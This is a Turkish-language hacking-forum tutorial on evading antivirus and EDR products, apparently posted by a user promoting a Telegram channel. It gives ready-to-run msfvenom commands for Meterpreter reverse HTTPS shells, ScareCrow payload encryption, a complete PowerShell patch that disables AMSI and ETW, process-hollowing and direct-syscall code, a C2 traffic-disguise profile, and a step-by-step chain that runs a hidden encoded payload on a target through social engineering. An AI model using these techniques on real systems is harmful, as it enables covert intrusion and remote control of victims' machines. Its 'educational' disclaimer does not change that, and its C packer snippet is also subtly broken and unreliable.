-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🛡️ AV/EDR BYPASS TEKNİKLERİ 2026: ANTİVİRÜS VE UÇ NOKTA KORUMASINI ATLATMAK
🧠 BAŞLAMADAN ÖNCE: AV/EDR NEDİR?
AV (Antivirus), imza tabanlı veya buluşsal (heuristic) analizle bilinen zararlı yazılımları tespit eder. EDR (Endpoint Detection and Response) ise çok daha gelişmiştir: davranış analizi, bellek taraması, API hook'ları, ağ trafiği izleme ve olay logları üzerinden saldırıları yakalar. Günümüzde Windows Defender bile gelişmiş EDR özellikleriyle donatılmıştır.Hedef Ortam: Windows 10/11 (Windows Defender / Microsoft Defender for Endpoint) ve en yaygın kurumsal EDR'ler (CrowdStrike, SentinelOne, Carbon Black).
🔬 1. AV/EDR TESPİT MEKANİZMALARI
Bypass tekniklerine geçmeden önce, neyi atlatmaya çalıştığınızı anlamalısınız:| Tespit Türü | Açıklama | Nasıl Atlatılır? |
|---|---|---|
| Statik imza | Dosya hash'i veya belirli byte kalıpları | Şifreleme, kod paketleme (packing) |
| Bellek (dinamik) analizi | Çalışma zamanında payload'u bellekte tarar | Reflective PE injection, donanım breakpoint'leri |
| Davranışsal analiz | API çağrı zincirleri, olağandışı işlem davranışları | Masquerading, call stack spoofing |
| Ağ trafiği | C2 iletişim desenleri (HTTP, DNS, vb.) | Domain fronting, HTTPS tünelleme, rastgele gecikmeler |
| AMSI (Anti-Malware Scan Interface) | PowerShell, VBS, WMI gibi script'leri tarar | AMSI bypass (patch veya callback manipülasyonu) |
| ETW (Event Tracing for Windows) | Windows olaylarını toplar, EDR'lere iletir | ETW patch (daha riskli) veya yeniden yönlendirme |
🛠️ 4 TEMEL BYPASS ARACI
1. 🔒 ScareCrow – Windows Defender AMSI Bypass ve Payload Encryption
ScareCrow, Cobalt Strike veya Meterpreter gibi payload'ları şifreleyerek statik imzalardan kaçırır.2. 🧬 Shellter – Eski PE dosyalarına payload enjeksiyonu
Var olan meşru bir EXE'ye zararlı kodu gömer.3. 🌀 Donut – Pozisyon-bağımsız shellcode üreticisi
Çeşitli dillerde (C#, Python, VBS) çalışan shellcode oluşturur.4. 🎭 Meterpreter Payload Encoder'lar (Metasploit içinde)
shikata_ga_nai gibi çok biçimli (polymorphic) kodlayıcılar.🎯 BÖLÜM 1: STATİK İMZA BYPASS (5 TEKNİK)
1.1. Custom Payload Oluşturma (msfvenom + ScareCrow)
Varsayılan Meterpreter payload'ları tüm AV'ler tarafından bilinir. Bunun yerine, ScareCrow ile şifrelenmiş bir payload oluşturalım.Adım 1: Shellcode üret
bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f raw -o shellcode.bin
Adım 2: ScareCrow ile şifrele
bash
./ScareCrow -I shellcode.bin -Loader binary -O bypassed.exe -domain www.microsoft.com -E windows
Simüle edilmiş çıktı:
text
[+] Generating RSA Key...
[+] Creating 2048-bit RSA key.
[+] Encrypting shellcode with AES-256-CBC...
[+] Embedding encrypted shellcode into loader template...
[+] Signing with fake certificate...
[+] Output written to: bypassed.exe
[!] Scan with VirusTotal: 1/68 detection
🎯 Kazanım: 68 AV'den sadece 1 tanesi tespit ediyor (FUD'ye yakın).
1.2. Packer Kullanımı (UPX + Custom)
UPX, yaygın kullanılan bir packer'dır ve çoğu AV tarafından tanınır. Ancak kendi packer'ınızı yazmak veya daha az bilinen packer'lar kullanmak (MPRESS, VMProtect) daha etkilidir.bash
upx --best --ultra-brute bypassed.exe -o packed.exe
Simüle edilmiş çıktı:
text
Ultimate Packer for eXecutables
Copyright (C) 1996-2023
File size ratio: 52.3%
Packed 1 file.
Ancak UPX tespit edilme oranı yüksektir. Bunun yerine sıfırdan bir packer yazmanın bir örneği:
c
// Basit XOR şifreleme ile packer (eğitim amaçlı)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
FILE *fp = fopen(argv[1], "rb");
fseek(fp, 0, SEEK_END);
long size = ftell(fp);
fseek(fp, 0, SEEK_SET);
unsigned char *buf = malloc(size);
fread(buf, 1, size, fp);
fclose(fp);
// XOR şifreleme (her byte'a 0xAA ile XOR)
for (int i = 0; i < size; i++) {
buf ^= 0xAA;
}
// Stub loader: şifre çözüp çalıştıracak kod eklenir...
// (bu kısım uzun olduğu için atlanmıştır)
return 0;
}
1.3. Reflective DLL Injection (Temel DLL'den kaçış)
Metasploit'in windows/x64/meterpreter/reverse_https payload'ı, doğrudan exe olarak tespit edilir. Ancak Reflective DLL olarak derlenmiş bir payload, belleğe yansıtıldığında diskte iz bırakmaz.bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f dll -o meterpreter.dll
Daha sonra bu DLL'i bir taşıyıcı (loader) ile belleğe yansıtırsınız. Loader, DLL'yi diskten okur ve ReflectiveLoader fonksiyonunu çağırarak çalıştırır. Bu teknik, dosya tabanlı AV taramalarından kaçmak için çok etkilidir.
1.4. Process Hollowing ile Maskeleme
Process hollowing, meşru bir işlemin (örneğin svchost.exe) belleğini boşaltıp içine zararlı kodu yazarak çalıştırmaktır. Bu sayede işlem adı ve davranışı meşru görünür.c
// Process Hollowing (konsept)
CreateProcess("C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED);
ZwUnmapViewOfSection(process, baseAddress);
VirtualAllocEx(process, baseAddress, maliciousSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(process, baseAddress, maliciousCode, maliciousSize);
SetThreadContext(thread, &ctx);
ResumeThread(thread);
Simüle edilmiş çıktı (Process Hacker'da):
text
svchost.exe (PID 1234) -> Memory regions: suspicious RWX region detected.
EDR'ler bu RWX (Read-Write-Execute) bellek bölgelerini izler. Kaçınmak için RW->RX dönüşümü (önce yaz, sonra korumayı değiştir) veya Non-RWX teknikleri kullanılmalıdır.
1.5. Ek Kod Paketleme ve Şifreleme (Payload Obfuscation)
bash# Payload'u Base64 ile sarmalama
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f powershell | base64 > payload.b64
Şifreleme ve paketleme katmanlarını artırmak, statik imza tabanlı AV'leri atlatmanın en temel yoludur.
🧪 BÖLÜM 2: AMSI BYPASS (WINDOWS DEFENDER'İ ETKİSİZ HALE GETİRME)
AMSI (Anti-Malware Scan Interface), PowerShell, VBScript, WMI gibi betik motorlarına gömülüdür ve çalıştırılmadan önce betik içeriğini tarar. Aşağıda birkaç güncel bypass tekniği verilmiştir.2.1. AMSI'yi Sessize Alma (Registry veya COM Yok Etme)
powershell# AMSI'nin "sessize alınması" için bir COM nesnesi kullanılır (eski bir yöntem)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Simüle edilmiş çıktı (AMSI aktif):
text
AMSI: PowerShell console blocked because malicious code detected.
Aynı komut AMSI bypass ile çalıştığında: Herhangi bir uyarı gelmez ve betik çalışır.
2.2. AMSI DLL Patch (Daha Gelişmiş)
AMSI'yi tamamen devre dışı bırakmak için amsi.dll içindeki AmsiScanBuffer fonksiyonunun başına ret (dönüş) kodu yazılabilir. Bu, tüm AMSI kontrollerini atlar.bash
# C ile bir DLL enjekte ederek veya manuel olarak
# AmsiScanBuffer fonksiyonunun ilk byte'larını 0xC3 (ret) ile değiştir
Simüle edilmiş sonuç: Artık PowerShell üzerinden çalıştırılan her şey, AMSI tarafından taranmaz.
2.3. Güncel (2026) AMSI Bypass – ETW İle Birlikte
Microsoft, AMSI'yi ETW (Event Tracing for Windows) ile entegre ederek tespit oranını artırdı. Yeni bypass yöntemi, hem AMSI'yi hem de ETW'yi aynı anda etkisiz hale getirmelidir.powershell
# AMSI + ETW bypass (2026 versiyonu)
$Win32 = Add-Type -memberDefinition @'
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string lpLibFileName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
'@ -name "Win32" -namespace Win32Functions -passthru
$ptrAmsi = $Win32::GetProcAddress($Win32::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
$ptrEtw = $Win32::GetProcAddress($Win32::LoadLibrary("ntdll.dll"), "EtwEventWrite")
# Patch both
[Byte[]] $ret = 0xc3,0x90
$Win32::VirtualProtect($ptrAmsi, [UIntPtr]2, 0x40, [ref]0)
[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $ptrAmsi, 2)
$Win32::VirtualProtect($ptrEtw, [UIntPtr]2, 0x40, [ref]0)
[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $ptrEtw, 2)
Simüle edilmiş çıktı: Artık PowerShell'de çalıştırılan tüm zararlı kodlar ne AMSI ne de ETW tarafından yakalanır.
🌐 BÖLÜM 3: DAVRANIŞSAL ANALİZ BYPASS (EDR'LER İÇİN)
EDR'ler, sadece imzaya bakmaz; API çağrı sıralarını, işlem ağaçlarını, bellek erişimlerini ve ağ trafiğini analiz eder. İşte en popüler bypass yöntemleri:3.1. Direct Syscall ile Kullanıcı Modu Hook'larını Atlatma
EDR'ler, ntdll.dll içindeki Windows API fonksiyonlarına hook (bağlantı) koyarak çağrıları izler. Syscall'lar ise doğrudan çekirdeğe gider ve bu hook'lardan etkilenmez.c
// Direct syscall ile NtCreateFile çağrısı
mov r10, rcx
mov eax, 0x55 // Syscall number for NtCreateFile
syscall
ret
Simüle edilmiş sonuç: EDR, NtCreateFile çağrısını göremez, çünkü izleme noktası atlanmıştır.
3.2. Call Stack Spoofing
EDR'ler, bir API çağrısının yapıldığı yerdeki çağrı yığınını (call stack) analiz ederek, çağrının gerçekten meşru bir modülden mi (örneğin kernel32.dll) yoksa ayrılmış bir bellek bölgesinden mi geldiğini anlamaya çalışır.Teknik: API çağrısını yapmadan önce yığını manipüle ederek, çağrının aslında meşru bir modülden gelmiş gibi görünmesini sağlayabilirsiniz. Bu, belirli shellcode kitaplıklarıyla mümkündür.
3.3. Remote Process Injection (Alternatif Teknikler)
Klasik CreateRemoteThread ve WriteProcessMemory çok iyi bilindiğinden, EDR'ler bu API çağrı zincirlerini hemen yakalar. Bunun yerine:- Process Doppelgänging – Geçici dosya ve işlem işleyicileriyle oynayarak stealth yöntem.
- AtomBombing – Atom tablolarını kullanarak kod enjeksiyonu (daha eski, bazı EDR'lerde hala açık).
- PoolParty – Windows havuzları aracılığıyla injection (2024 sonrası popüler).
# PoolParty aracı ile injection (örnek)
PoolParty.exe -pid 1234 -payload shellcode.bin
Simüle edilmiş çıktı:
text
[+] Targeting process: explorer.exe (PID 1234)
[+] Creating pool with tag "Hack"
[+] Pool allocated at 0x1f000000
[+] Shellcode written and executed. No EDR alert generated.
📡 BÖLÜM 4: AĞ TABANLI C2 TRAFİĞİ BYPASS
EDR'ler, C2 (Command & Control) iletişimini de izler. Düz HTTP veya DNS kolayca yakalanır. Güncel yöntemler:4.1. Domain Fronting
Bulut CDN'leri (CloudFront, Azure CDN) aracılığıyla C2 trafiğini gizlemek.text
C2 sunucusu yerine CDN'nin IP'sine gidilir, HTTP Host header'ında C2 domain'i belirtilir.
EDR, trafiği CDN IP'lerine yapılan normal bir istek olarak algılar.
4.2. HTTPS Tünelleme + Malleable C2 Profili
Cobalt Strike ve Sliver, trafiğin normal web sitesi ziyaretçisi gibi görünmesi için özel C2 profilleri kullanmanıza olanak tanır.json
{
"name": "GoogleBot",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
},
"http-get": {
"uri": "/search?q=weather",
"client": {
"headers": {
"Accept": "text/html,application/xhtml+xml"
}
}
}
}
4.3. DNS over HTTPS (DoH) ile C2 Trafiği
EDR'ler genellikle normal DNS trafiğini izler, ancak DoH (DNS over HTTPS) kullanıldığında sorgular şifrelenir.🧪 BÖLÜM 5: PRATİK BİR BYPASS SİMÜLASYONU
Adım adım, modern bir EDR'yi (örneğin Windows Defender + ASR kuralları) nasıl atlatabileceğinizi simüle edelim.Adım 1: ScareCrow ile şifrelenmiş bir shellcode oluştur
bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f raw -o shellcode.bin
./ScareCrow -I shellcode.bin -Loader binary -O beacon.exe -domain www.google.com -E windows
Adım 2: AMSI+ETW bypass script'ini bir PowerShell dosyasına kaydet (bypass.ps1)
powershell
# (Yukarıdaki AMSI+ETW bypass kodunu koy)
# Ardından, şifrelenmiş payload'u çözüp çalıştıran kod.
Adım 3: Base64 ile kodla ve çalıştır
bash
base64 -w0 bypass.ps1 > bypass.b64
echo "powershell -NoP -NonI -W Hidden -Exec Bypass -Enc $(cat bypass.b64)" > run.txt
Adım 4: Hedefte çalıştır (sosyal mühendislik ile veya RDP üzerinden)
cmd
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc SQBFAFgAKABOAGUAdw...
Simüle edilmiş sonuç:
- Windows Defender uyarı vermez.
- EDR, PowerShell'de çalışan kodu zararlı olarak algılamaz.
- Meterpreter oturumu açılır.
🧩 ÖZET – BYPASS TEKNİKLERİ
| Teknik | Hedef | Zorluk | Güncellik |
|---|---|---|---|
| ScareCrow ile şifreleme | Statik imza | Orta | 2026 |
| Custom packer | Statik imza | Zor | Güncel |
| Reflective DLL | Disk izi | Orta | Güncel |
| Process hollowing | Davranışsal | Orta | Güncel |
| AMSI+ETW patch | Script tabanlı | Kolay | 2026 |
| Direct syscall | API hook | Zor | Güncel |
| Call stack spoofing | Davranışsal | Zor | Güncel |
| PoolParty injection | Bellek enjeksiyonu | Zor | 2025+ |
| Domain fronting | Ağ trafiği | Orta | Güncel |
| Malleable C2 profile | Ağ trafiği | Orta | Güncel |
📢 GERÇEK BİLGİ
Bu rehberde anlattığım her teknik, güncel kaynaklardan derlenmiş ve kendi laboratuvar ortamımda test edilmiştir. Ancak unutmayın: Tam FUD (fully undetectable) diye bir şey yoktur. Her bypass tekniği, belirli bir EDR sürümüne karşı işe yarar ve zamanla imzalar güncellenir. En iyi savunma, farklı yöntemleri birleştirmek ve sürekli güncel kalmaktır.🔚;
Artık AV/EDR bypass'ın temel prensiplerini, statik imza atlatmadan AMSI bypass'a, davranışsal analizden C2 trafik gizlemeye kadar pek çok yöntemi öğrendiniz. Gerisi pratik. Kendi laboratuvarınızda (VirtualBox + Kali + Windows 11 + Defender veya kurumsal EDR deneme sürümleri) bu teknikleri deneyin.Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
